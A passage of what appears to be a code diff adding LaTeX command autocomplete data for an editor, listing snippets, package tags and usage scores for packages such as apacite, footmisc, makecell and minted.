'\\shortcite{}', + snippet: '\\shortcite{$1}', + meta: 'apacite-cmd', + score: 0.010082057767216608, + }, + { + caption: '\\shortciteA{}', + snippet: '\\shortciteA{$1}', + meta: 'apacite-cmd', + score: 0.0011019769466422762, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'apacite-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'apacite-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'apacite-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citeA{}', + snippet: '\\citeA{$1}', + meta: 'apacite-cmd', + score: 0.008470555729707068, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'apacite-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'apacite-cmd', + score: 2.341195220791228, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'apacite-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\BPG', + snippet: '\\BPG', + meta: 'apacite-cmd', + score: 0.00023651453263545777, + }, + { + caption: '\\citeNP{}', + snippet: '\\citeNP{$1}', + meta: 'apacite-cmd', + score: 0.0003168688289795556, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'apacite-cmd', + score: 0.01359248786373484, + }, + ], + mathpazo: [ + { + caption: '\\big', + snippet: '\\big', + meta: 'mathpazo-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\mathbb{}', + snippet: '\\mathbb{$1}', + meta: 'mathpazo-cmd', + score: 0.33740449739178857, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathpazo-cmd', + score: 0.050370758781422345, + }, + ], + footmisc: [ + { + caption: 
'\\footref{}', + snippet: '\\footref{$1}', + meta: 'footmisc-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'footmisc-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'footmisc-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\multfootsep', + snippet: '\\multfootsep', + meta: 'footmisc-cmd', + score: 0.00010171098214158578, + }, + { + caption: '\\footnotelayout', + snippet: '\\footnotelayout', + meta: 'footmisc-cmd', + score: 0.0004535003423927585, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'footmisc-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'footmisc-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'footmisc-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'footmisc-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'footmisc-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'footmisc-cmd', + score: 0.1789117552185788, + }, + ], + fixltx2e: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'fixltx2e-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'fixltx2e-cmd', + score: 0.354445763583904, + }, + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'fixltx2e-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\em', + snippet: '\\em', + meta: 'fixltx2e-cmd', + score: 0.10357353994640862, + }, + ], + sidecap: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'sidecap-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'sidecap-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sidecaptionvpos{}{}', + snippet: '\\sidecaptionvpos{$1}{$2}', + meta: 'sidecap-cmd', + score: 0.0006587927449241846, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'sidecap-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'sidecap-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'sidecap-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'sidecap-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'sidecap-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'sidecap-cmd', + score: 0.0018957469739775527, + }, + ], + nomencl: [ + { + caption: '\\nomenclature[]{}{}', + snippet: '\\nomenclature[$1]{$2}{$3}', + meta: 'nomencl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomenclature{}{}', + snippet: '\\nomenclature{$1}{$2}', + meta: 'nomencl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomlabel', + snippet: '\\nomlabel', + meta: 'nomencl-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\printnomenclature', + snippet: '\\printnomenclature', + meta: 'nomencl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\printnomenclature[]', + snippet: '\\printnomenclature[$1]', + meta: 'nomencl-cmd', + 
score: 0.0014526113324237952, + }, + { + caption: '\\makenomenclature', + snippet: '\\makenomenclature', + meta: 'nomencl-cmd', + score: 0.002310610204652063, + }, + { + caption: '\\nomgroup', + snippet: '\\nomgroup', + meta: 'nomencl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomgroup[]{}', + snippet: '\\nomgroup[$1]{$2}', + meta: 'nomencl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomname', + snippet: '\\nomname', + meta: 'nomencl-cmd', + score: 0.0015092617929470952, + }, + { + caption: '\\nompreamble', + snippet: '\\nompreamble', + meta: 'nomencl-cmd', + score: 2.4350510995473236e-5, + }, + { + caption: '\\nomentryend', + snippet: '\\nomentryend', + meta: 'nomencl-cmd', + score: 0.000137692304514793, + }, + ], + afterpage: [ + { + caption: '\\afterpage{}', + snippet: '\\afterpage{$1}', + meta: 'afterpage-cmd', + score: 0.0018578070791608345, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'afterpage-cmd', + score: 0.1789117552185788, + }, + ], + titling: [ + { + caption: '\\thanks{}', + snippet: '\\thanks{$1}', + meta: 'titling-cmd', + score: 0.08382259880654083, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'titling-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\posttitle{}', + snippet: '\\posttitle{$1}', + meta: 'titling-cmd', + score: 0.002507149245154055, + }, + { + caption: '\\postdate{}', + snippet: '\\postdate{$1}', + meta: 'titling-cmd', + score: 0.002139478682489868, + }, + { + caption: '\\predate{}', + snippet: '\\predate{$1}', + meta: 'titling-cmd', + score: 0.002139478682489868, + }, + { + caption: '\\preauthor{}', + snippet: '\\preauthor{$1}', + meta: 'titling-cmd', + score: 0.0023736543205198435, + }, + { + caption: '\\postauthor{}', + snippet: '\\postauthor{$1}', + meta: 'titling-cmd', + score: 0.0023736543205198435, + }, + { + caption: '\\pretitle{}', + snippet: '\\pretitle{$1}', + meta: 'titling-cmd', + score: 0.002507149245154055, + }, + ], + wasysym: [ + { + caption: '\\checked', + snippet: '\\checked', + meta: 'wasysym-cmd', + score: 0.0027792832228568255, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'wasysym-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\diameter', + snippet: '\\diameter', + meta: 'wasysym-cmd', + score: 0.0001645367385856751, + }, + { + caption: '\\CIRCLE', + snippet: '\\CIRCLE', + meta: 'wasysym-cmd', + score: 0.000250667024953401, + }, + ], + eurosym: [ + { + caption: '\\EUR{}', + snippet: '\\EUR{$1}', + meta: 'eurosym-cmd', + score: 3.661595357097087e-5, + }, + ], + caption2: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption2-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption2-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption2-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'caption2-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + 
meta: 'caption2-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption2-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption2-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption2-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption2-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption2-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption2-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'caption2-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption2-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption2-cmd', + score: 0.021473212893597875, + }, + ], + amsbsy: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'amsbsy-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'amsbsy-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'amsbsy-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'amsbsy-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsbsy-cmd', + score: 0.0063276692758974925, + }, + ], + CJK: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'CJK-cmd', + score: 0.04598628699063736, + }, + ], + makecell: [ + { + caption: '\\diaghead{}{}{}', + snippet: '\\diaghead{$1}{$2}{$3}', + meta: 'makecell-cmd', + score: 2.0417817976377812e-5, + }, + { + caption: '\\makecell{}', + snippet: '\\makecell{$1}', + meta: 'makecell-cmd', + score: 0.005023670619810683, + }, + { + caption: '\\makecell[]{}', + snippet: '\\makecell[$1]{$2}', + meta: 'makecell-cmd', + score: 0.005023670619810683, + }, + { + caption: '\\height', + snippet: '\\height', + meta: 'makecell-cmd', + score: 0.0045883162478394055, + }, + { + caption: '\\height{}', + snippet: '\\height{$1}', + meta: 'makecell-cmd', + score: 0.0045883162478394055, + }, + { + caption: '\\setcellgapes{}', + snippet: '\\setcellgapes{$1}', + meta: 'makecell-cmd', + score: 0.0004960838428758984, + }, + { + caption: '\\thead{}', + snippet: '\\thead{$1}', + meta: 'makecell-cmd', + score: 0.0023087638254186797, + }, + { + caption: '\\Gape[]', + snippet: '\\Gape[$1]', + meta: 'makecell-cmd', + score: 0.000469300371741866, + }, + { + caption: '\\theadgape{}', + snippet: '\\theadgape{$1}', + meta: 'makecell-cmd', + score: 0.000234650185870933, + }, + { + caption: '\\theadalign', + snippet: '\\theadalign', + meta: 'makecell-cmd', + score: 0.0006746935448099005, + }, + { + caption: '\\theadalign{}', + snippet: '\\theadalign{$1}', + meta: 'makecell-cmd', + score: 0.0006746935448099005, + }, + { + caption: '\\theadset{}', + snippet: '\\theadset{$1}', + meta: 'makecell-cmd', + score: 0.0004400433589389675, + }, + { + caption: '\\Xhline{}', + snippet: '\\Xhline{$1}', + meta: 'makecell-cmd', + score: 0.0024175651338281096, + }, + { + caption: '\\theadfont{}', + snippet: '\\theadfont{$1}', + meta: 
'makecell-cmd', + score: 0.0007935193556772338, + }, + { + caption: '\\theadfont', + snippet: '\\theadfont', + meta: 'makecell-cmd', + score: 0.0007935193556772338, + }, + { + caption: '\\cellgape{}', + snippet: '\\cellgape{$1}', + meta: 'makecell-cmd', + score: 0.000234650185870933, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'makecell-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'makecell-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\makegapedcells', + snippet: '\\makegapedcells', + meta: 'makecell-cmd', + score: 0.000431467454221244, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'makecell-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'makecell-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'makecell-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'makecell-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'makecell-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'makecell-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'makecell-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'makecell-cmd', + score: 0.018615449342361392, + }, + ], + xeCJK: [ + { + caption: '\\setCJKmonofont{}', + snippet: '\\setCJKmonofont{$1}', + meta: 'xeCJK-cmd', + score: 0.0057178353252375245, + }, + { + caption: '\\setCJKmainfont{}', + snippet: '\\setCJKmainfont{$1}', + meta: 'xeCJK-cmd', + score: 0.006622926778590894, + }, + { + caption: '\\setCJKmainfont[]{}', + snippet: '\\setCJKmainfont[$1]{$2}', + meta: 'xeCJK-cmd', + score: 0.006622926778590894, + }, + { + caption: '\\setCJKsansfont{}', + snippet: '\\setCJKsansfont{$1}', + meta: 'xeCJK-cmd', + score: 0.0057178353252375245, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xeCJK-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xeCJK-cmd', + score: 0.2864294797053033, + }, + ], + threeparttable: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttable-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttable-cmd', + score: 3.800886892251021, + }, + ], + dirtytalk: [ + { + caption: '\\say{}', + snippet: '\\say{$1}', + meta: 'dirtytalk-cmd', + score: 0.010246289746417045, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'dirtytalk-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'dirtytalk-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'dirtytalk-cmd', + score: 0.009331077109224957, + }, + { + caption: 
'\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'dirtytalk-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'dirtytalk-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'dirtytalk-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'dirtytalk-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'dirtytalk-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'dirtytalk-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'dirtytalk-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'dirtytalk-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'dirtytalk-cmd', + score: 0.021170869458413965, + }, + ], + balance: [ + { + caption: '\\balance', + snippet: '\\balance', + meta: 'balance-cmd', + score: 0.003629066156300264, + }, + { + caption: '\\balance{}', + snippet: '\\balance{$1}', + meta: 'balance-cmd', + score: 0.003629066156300264, + }, + ], + minted: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\usemintedstyle{}', + snippet: '\\usemintedstyle{$1}', + meta: 'minted-cmd', + score: 0.00184279823796158, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\inputminted[]{}{}', + snippet: '\\inputminted[$1]{$2}{$3}', + meta: 'minted-cmd', + score: 0.0016501519191680601, + }, + { + caption: '\\inputminted{}{}', + snippet: '\\inputminted{$1}{$2}', + meta: 'minted-cmd', + score: 0.0016501519191680601, + }, + { + caption: '\\setminted[]{}', + snippet: '\\setminted[$1]{$2}', + meta: 'minted-cmd', + score: 0.0004017914210172805, + }, + { + caption: '\\setminted{}', + snippet: '\\setminted{$1}', + meta: 'minted-cmd', + score: 0.0004017914210172805, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'minted-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + 
snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'minted-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'minted-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'minted-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'minted-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'minted-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'minted-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'minted-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'minted-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'minted-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'minted-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'minted-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'minted-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'minted-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'minted-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'minted-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'minted-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'minted-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'minted-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'minted-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + 
meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fbox{}', + snippet: '\\fbox{$1}', + meta: 'minted-cmd', + score: 0.020865450075016792, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'minted-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\pagewiselinenumbers', + snippet: '\\pagewiselinenumbers', + meta: 'minted-cmd', + score: 0.00016870831850106035, + }, + { + caption: '\\linenomath', + snippet: '\\linenomath', + meta: 'minted-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\linenumberfont{}', + snippet: '\\linenumberfont{$1}', + meta: 'minted-cmd', + score: 0.0001811784338695797, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endlinenomath', + snippet: '\\endlinenomath', + meta: 'minted-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\nolinenumbers', + snippet: '\\nolinenumbers', + meta: 'minted-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\path', + snippet: '\\path', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path[]', + snippet: '\\path[$1]', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path{}', + snippet: '\\path{$1}', + meta: 'minted-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\filedate{}', + snippet: '\\filedate{$1}', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\filedate', + snippet: '\\filedate', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\linenumbers', + snippet: '\\linenumbers', + meta: 'minted-cmd', + score: 0.004687680659497865, + }, + { + caption: '\\modulolinenumbers[]', + snippet: '\\modulolinenumbers[$1]', + meta: 'minted-cmd', + score: 0.0027194991933605197, + }, + { + caption: '\\fileversion{}', + snippet: '\\fileversion{$1}', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\fileversion', + snippet: '\\fileversion', + meta: 'minted-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'minted-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'minted-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'minted-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fvset{}', + snippet: '\\fvset{$1}', + meta: 'minted-cmd', + score: 0.00015476887282479622, + }, + { + caption: '\\robustify{}', + snippet: 
'\\robustify{$1}', + meta: 'minted-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'minted-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'minted-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'minted-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'minted-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'minted-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'minted-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'minted-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'minted-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'minted-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: 